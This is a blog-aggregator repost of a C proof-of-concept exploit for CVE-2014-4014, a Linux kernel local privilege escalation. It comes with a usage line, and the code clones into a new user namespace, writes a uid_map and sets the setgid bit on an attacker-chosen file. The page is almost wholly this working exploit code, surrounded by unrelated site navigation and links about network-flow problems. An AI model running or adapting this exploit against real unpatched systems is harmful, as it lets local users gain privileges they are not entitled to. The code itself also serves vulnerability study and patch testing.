zoukankan      html  css  js  c++  java
  • CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**
     * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
     *
     * Vitaly Nikolenko
     * http://hashcrack.org
     *
     * Usage: ./poc [file_path]
     *
     * where file_path is the file on which you want to set the sgid bit
     */
    #define _GNU_SOURCE
    #include <sys/wait.h>
    #include <sched.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <limits.h>
    #include <string.h>
    #include <assert.h>
     
    #define STACK_SIZE (1024 * 1024)
    static char child_stack[STACK_SIZE];
     
    struct args {
        int pipe_fd[2];
        char *file_path;
    };
     
    static int child(void *arg) {
        struct args *f_args = (struct args *)arg;
        char c;
     
        // close stdout
        close(f_args->pipe_fd[1]);
     
        assert(read(f_args->pipe_fd[0], &c, 1) == 0);
     
        // set the setgid bit
        chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
     
        return 0;
    }
     
    int main(int argc, char *argv[]) {
        int fd;
        pid_t pid;
        char mapping[1024];
        char map_file[PATH_MAX];
        struct args f_args;
     
        assert(argc == 2);
     
        f_args.file_path = argv[1];
        // create a pipe for synching the child and parent
        assert(pipe(f_args.pipe_fd) != -1);
     
        pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
        assert(pid != -1);
     
        // get the current uid outside the namespace
        snprintf(mapping, 1024, "0 %d 1 ", getuid());
     
        // update uid and gid maps in the child
        snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
        fd = open(map_file, O_RDWR); assert(fd != -1);
     
        assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
        close(f_args.pipe_fd[1]);
     
        assert (waitpid(pid, NULL, 0) != -1);
    }
  • 相关阅读:
    AC日记——可能的路径 51nod 1247
    AC日记——[国家集训队2011]旅游(宋方睿) cogs 1867
    近期将要学习的内容(flag)
    Cogs 734. [网络流24题] 方格取数问题(最大闭合子图)
    Cogs 746. [网络流24题] 骑士共存(最大独立集)
    Cogs 729. [网络流24题] 圆桌聚餐
    [网络流24题]飞行员配对方案问题
    Hdu 3549 Flow Problem(最大流)
    Cogs 14. [网络流24题] 搭配飞行员(二分图匹配)
    Cogs 728. [网络流24题] 最小路径覆盖问题
  • 原文地址:https://www.cnblogs.com/bittorrent/p/3854628.html
Copyright © 2011-2022 走看看